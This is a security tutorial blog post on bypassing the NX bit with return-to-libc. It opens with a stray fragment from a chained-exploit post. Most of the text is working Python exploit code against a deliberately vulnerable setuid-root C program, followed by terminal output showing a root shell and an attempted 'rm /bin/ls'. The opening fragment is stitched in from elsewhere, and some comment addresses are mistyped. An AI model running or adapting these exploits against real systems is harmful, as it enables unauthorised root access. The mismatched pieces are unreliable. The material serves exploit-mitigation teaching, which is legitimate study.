system_arg = 0x804829d
exit_arg = 0xffffffff

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

buf = "A" * 264 
buf += conv(fake_ebp0) 
buf += conv(leave_ret) 
#Below four stack frames are for sprintf (to setup seteuid arg )
buf += conv(fake_ebp1) 
buf += conv(sprintf_addr) 
buf += conv(leave_ret) 
buf += conv(sprintf_arg1) 
buf += conv(sprintf_arg2) 
buf += conv(sprintf_arg3) 
buf += conv(fake_ebp2) 
buf += conv(sprintf_addr) 
buf += conv(leave_ret) 
sprintf_arg1 += 1
buf += conv(sprintf_arg1) 
buf += conv(sprintf_arg2) 
buf += conv(sprintf_arg3) 
buf += conv(fake_ebp3) 
buf += conv(sprintf_addr) 
buf += conv(leave_ret) 
sprintf_arg1 += 1
buf += conv(sprintf_arg1) 
buf += conv(sprintf_arg2) 
buf += conv(sprintf_arg3) 
buf += conv(fake_ebp4) 
buf += conv(sprintf_addr) 
buf += conv(leave_ret) 
sprintf_arg1 += 1
buf += conv(sprintf_arg1) 
buf += conv(sprintf_arg2) 
buf += conv(sprintf_arg3)
#Dummy - To avoid null byte in fake_ebp4. 
buf += "X" * 4 
#Below stack frame is for seteuid
buf += conv(fake_ebp5) 
buf += conv(seteuid_addr) 
buf += conv(leave_ret) 
#Dummy - This arg is zero'd by above four sprintf calls
buf += "Y" * 4 
#Below stack frame is for system
buf += conv(fake_ebp6) 
buf += conv(system_addr) 
buf += conv(leave_ret) 
buf += conv(system_arg) 
#Below stack frame is for exit
buf += conv(fake_ebp7) 
buf += conv(exit_addr) 
buf += conv(leave_ret) 
buf += conv(exit_arg) 

print "Calling vulnerable program"
call(["./vuln", buf])

Executing the above exploit code gives us root shell!!

$ python exp.py 
Calling vulnerable program
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����������������\��������������\��������������\�������������\��� �������AAAA0�������Ѕ
# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

Now having bypassed NX bit completely, lets see how to bypass ASLR in the next post.

Bypassing NX bit using return-to-libc

Prerequisite:

  1. Classic Stack Based Buffer Overflow

VM Setup: Ubuntu 12.04 (x86)

In previous posts, we saw that attacker

  • copies shellcode to stack and jumps to it!!

in order to successfully exploit vulnerable code. Hence to thwart attacker’s action, security researchers came up with an exploit mitigation called “NX Bit”!!

What is NX Bit?

Its an exploit mitigation technique which makes certain areas of memory non executable and makes an executable area, non writable. Example: Data, stack and heap segments are made non executable while text segment is made non writable.

With NX bit turned on, our classic approach to stack based buffer overflow will fail to exploit the vulnerability. Since in classic approach, shellcode was copied into the stack and return address was pointing to shellcode. But now since stack is no more executable, our exploit fails!! But this mitigation technique is not completely foolproof, hence in this post lets see how to bypass NX Bit!!

Vulnerable Code: This code is same as previous post vulnerable code with a slight modification. I will talk later about the need for modification.

 //vuln.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
 char buf[256]; /* [1] */ 
 strcpy(buf,argv[1]); /* [2] */
 printf("%s\n",buf); /* [3] */
 fflush(stdout);  /* [4] */
 return 0;
}

Compilation Commands:

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -g -fno-stack-protector -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

NOTE: “-z execstack” argument isnt passed to gcc and hence now the stack is Non eXecutable which can be verified as shown below:

$ readelf -l vuln
...
Program Headers:
 Type      Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
 PHDR      0x000034 0x08048034 0x08048034 0x00120 0x00120 R E 0x4
 INTERP    0x000154 0x08048154 0x08048154 0x00013 0x00013 R 0x1
 [Requesting program interpreter: /lib/ld-linux.so.2]
 LOAD      0x000000 0x08048000 0x08048000 0x00678 0x00678 R E 0x1000
 LOAD      0x000f14 0x08049f14 0x08049f14 0x00108 0x00118 RW 0x1000
 DYNAMIC   0x000f28 0x08049f28 0x08049f28 0x000c8 0x000c8 RW 0x4
 NOTE      0x000168 0x08048168 0x08048168 0x00044 0x00044 R 0x4
 ...
 GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
 GNU_RELRO 0x000f14 0x08049f14 0x08049f14 0x000ec 0x000ec R 0x1
$

Stack segment contains only RW Flag and no E flag!!

How to bypass NX bit and achieve arbitrary code execution?

NX bit can be bypassed using an attack technique called “return-to-libc”. Here return address is overwritten with a particular libc function address (instead of stack address containing the shellcode). For example if an attacker wants to  spawn a shell, he overwrites return address with system() address and also sets up the appropriate arguments required by system() in the stack, for its successful invocation.

Having already disassembled and drawn the stack layout for vulnerable code, lets write an exploit code to bypass NX bit!!

Exploit Code:

#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

#Since ALSR is disabled, libc base address would remain constant and hence we can easily find the function address we want by adding the offset to it. 
#For example system address = libc base address + system offset
#where 
       #libc base address = 0xb7e22000 (Constant address, it can also be obtained from cat /proc//maps)
       #system offset     = 0x0003f060 (obtained from "readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system")

system = 0xb7e61060        #0xb7e2000+0x0003f060
exit = 0xb7e54be0          #0xb7e2000+0x00032be0

#system_arg points to 'sh' substring of 'fflush' string. 
#To spawn a shell, system argument should be 'sh' and hence this is the reason for adding line [4] in vuln.c. 
#But incase there is no 'sh' in vulnerable binary, we can take the other approach of pushing 'sh' string at the end of user input!!
system_arg = 0x804827d     #(obtained from hexdump output of the binary)

#endianess conversion
def conv(num):
 return struct.pack("<I",num)

# Junk + system + exit + system_arg
buf = "A" * 268
buf += conv(system)
buf += conv(exit)
buf += conv(system_arg)

print "Calling vulnerable program"
call(["./vuln", buf])

Executing above exploit program gives us root shell as shown below:

$ python exp.py 
Calling vulnerable program
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`���K��}�
# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

Bingo we got the root shell!! But in real applications, its NOT that easy since root setuid programs would have adopted principle of least privilege.

What is principle of least privilege?

This technique allows root setuid program to obtain root privilege only when required. That is when required they gain root privilege and when NOT required they drop the obtained root privilege. Normal approach followed by root setuid programs is to drop root privileges before getting input from the user. Thus even when user input is malicious, attacker wont get a root shell. For example below vulnerable code wont allow the attacker to get a root shell.

Vulnerable Code:

//vuln_priv.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
 char buf[256];
 seteuid(getuid()); /* Temporarily drop privileges */ 
 strcpy(buf,argv[1]);
 printf("%s\n",buf);
 fflush(stdout);
 return 0;
}

Above vulnerable code doesnt give root shell when we try to exploit it using below exploit code.

#exp_priv.py
#!/usr/bin/env python
import struct
from subprocess import call

system = 0xb7e61060
exit = 0xb7e54be0

system_arg = 0x804829d

#endianess conversion
def conv(num):
 return struct.pack("<I",num)

# Junk + system + exit + system_arg
buf = "A" * 268
buf += conv(system)
buf += conv(exit)
buf += conv(system_arg)

print "Calling vulnerable program"
call(["./vuln_priv", buf])

NOTE: exp_priv.py is slightly modified version of exp.py!! Just the system_arg variable is adjusted!!

$ python exp_priv.py 
Calling vulnerable program
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`���K川�
$ id
uid=1000(sploitfun) gid=1000(sploitfun) egid=0(root) groups=1000(sploitfun),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare)
$ rm /bin/ls
rm: remove write-protected regular file `/bin/ls'? y
rm: cannot remove `/bin/ls': Permission denied
$ exit
$

Is this the end of tunnel? How to exploit root setuid programs which applies principle of least privilege?

For vulnerable code (vuln_priv), our exploit (exp_priv.py) was calling system followed by exit which found to be insufficent for obtaining root shell. But if our exploit code (exp_priv.py) was modified to call the following libc functions (in the listed order)

  • seteuid(0)
  • system(“sh”)
  • exit()

we would have obtained the root shell. This technique is called chaining of return-to-libc and its discussed here!!